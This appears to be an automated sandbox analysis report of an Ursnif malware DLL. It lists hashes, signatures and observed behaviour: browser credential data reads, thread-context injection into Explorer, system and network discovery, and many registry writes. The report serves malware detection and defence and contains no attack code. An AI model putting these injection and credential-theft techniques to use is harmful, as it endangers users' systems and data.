Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
25-11-2020 17:52
Static task
static1
Behavioral task
behavioral1
Sample
c9d954b3f1c512e6804fd8f5637b58b6.dll
Resource
win7v20201028
0 signatures
0 seconds
General
-
Target
c9d954b3f1c512e6804fd8f5637b58b6.dll
-
Size
234KB
-
MD5
c9d954b3f1c512e6804fd8f5637b58b6
-
SHA1
b452040d8072117ddbe1adf9e1eab5e4bdb150bd
-
SHA256
d7fafabbb381c34185ad30f0d5337ec8072d0705e0e9fb1d91e7358ed934fff3
-
SHA512
a4e949017016c1cfaa9bdff664c8ee20b2a34fe78788de9a4338ae5ad9a8a2623ccafe6d4584ef4f6cb29bc05dbcb3a71cbcd4051560287fbe74fb5a5738c09b
Malware Config
Extracted
Family
ursnif
Attributes
- dga_base_url
-
dga_crc
0
-
dga_season
0
- dga_tlds
- dns_servers
Signatures
-
ServiceHost packer 1 IoCs
Detects ServiceHost packer used for .NET malware
resource yara_rule behavioral2/memory/812-32-0x0000000C09329000-mapping.dmp servicehost -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt regsvr32.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3916 set thread context of 3032 3916 powershell.exe 57 PID 3032 set thread context of 812 3032 Explorer.EXE 93 PID 3032 set thread context of 3416 3032 Explorer.EXE 60 PID 812 set thread context of 3924 812 cmd.exe 95 PID 3032 set thread context of 3408 3032 Explorer.EXE 107 PID 3032 set thread context of 3948 3032 Explorer.EXE 108 -
Program crash 1 IoCs
pid pid_target Process procid_target 2536 1412 WerFault.exe 72 -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 3684 net.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1640 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4052 systeminfo.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a09f576a6cc3d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30851948" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 305460636cc3d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8798DCF6-2F5F-11EB-B59A-DE6DDC9D1B26} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0c388636cc3d601 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1550852918" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a000000000200000000001066000000010000200000001f2b952abbb51ca22f728ce8626b74df3e04acbf78219ca9cb0afd963b771934000000000e8000000002000020000000a7f95d249eed6debc160601a6aee9ea4b58a2fa9ab96063455cd6bcf47cdd52a2000000007d985128fce0148e0dd0df56120ad74348bec5241362f7d74e6a775ef1a6c3440000000f98f6ae981139f58636ec59636e8d34f52a4fe8c832a95270e952c5cf3575f7dd0c4b24d367f69248ef30db62419a0f22d0efd7baeca3978436f616c328822bb iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9069926b6cc3d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0e0556c6cc3d601 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1550852918" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A6EFB4B9-2F5F-11EB-B59A-DE6DDC9D1B26} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a000000000200000000001066000000010000200000009c733a3ecb249f54c88e81a9f749476b79615245daa57bde349670eb356f0112000000000e8000000002000020000000c346b6a205914aa7e856b8dc80aa0221e518eafe1bf3043c7f8d21c4f18130b220000000d8dcb6537bb9b8f685b39c287a4d99fcf2cd92634cb108d054d31a0a29368a5f4000000005365c37a0c833d81848312c0231b09b8a7b59d76b036530a2928fd136ed9becbad3ce4773c2312b2486796bea28b7db60b09127f4754e6b51520600b2b1c691 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a00000000020000000000106600000001000020000000e28b8d47a643b85c43e00be90addf13490e60fb00d3e4c648e18dfd5fe48dc7c000000000e8000000002000020000000fa96ca4adaef76471be00109b46c2c26b77148a420ac2328474ae0847357bc5d20000000523e6b730d0ba3d5616fe628706f918d2286d0db4918d716c9ca7360d17140b0400000007683166471b8dbdec04287ae776d6f045583ea404a200c2008ad2306ac1a89ec39084903a1f6a0499b6e578f24a4383b7de7d211dde2ac4776d7b874ff77c01f iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a0000000002000000000010660000000100002000000091c1e07fda5be9b9225de1fa2c58b1e5c99ecba0f06bcc14b5238296921cbf4c000000000e8000000002000020000000e849e55a36c8c9db993a4912702f6b956595790746a87e1f0c90de9e2d8290d320000000cf737967110992b802ca9d7f639f455f46d91d6374af5f84dab6b7e563c79fde400000004850128b08301ba000b9b05464bc96e86a3335a1b8b906d2b78da5a486ba1acfa41b11a838cac1d67dbe18c4dd38954c609b0b12dce8a096ef60d5cae92e9b21 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a000000000200000000001066000000010000200000000aaf1c3f42e8e97be73ec9d5db4f348613ce9dac9d52b75838d10e363f20c03d000000000e8000000002000020000000c2f193eafc3c4743e90dd425b3d134dbecd9bf6664a96bd7682cc0f919a68105200000008427e7ea420566aff32e7651af0335d0503440c2c4ce2aecdf9fc888e86b3661400000005bede6d0c96d0618379e2ad3cfe7c876deb5aaca07e29490f795633873baeb81fb41e032403a0e65f30816b8bb82ea4c346d321773078c201dc0f2ebc1ac5c5c iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30851948" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3924 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3924 PING.EXE -
Suspicious behavior: EnumeratesProcesses 1067 IoCs
pid Process 1412 regsvr32.exe 1412 regsvr32.exe 3916 powershell.exe 3916 powershell.exe 3916 powershell.exe 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 2536 WerFault.exe 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 3032 Explorer.EXE 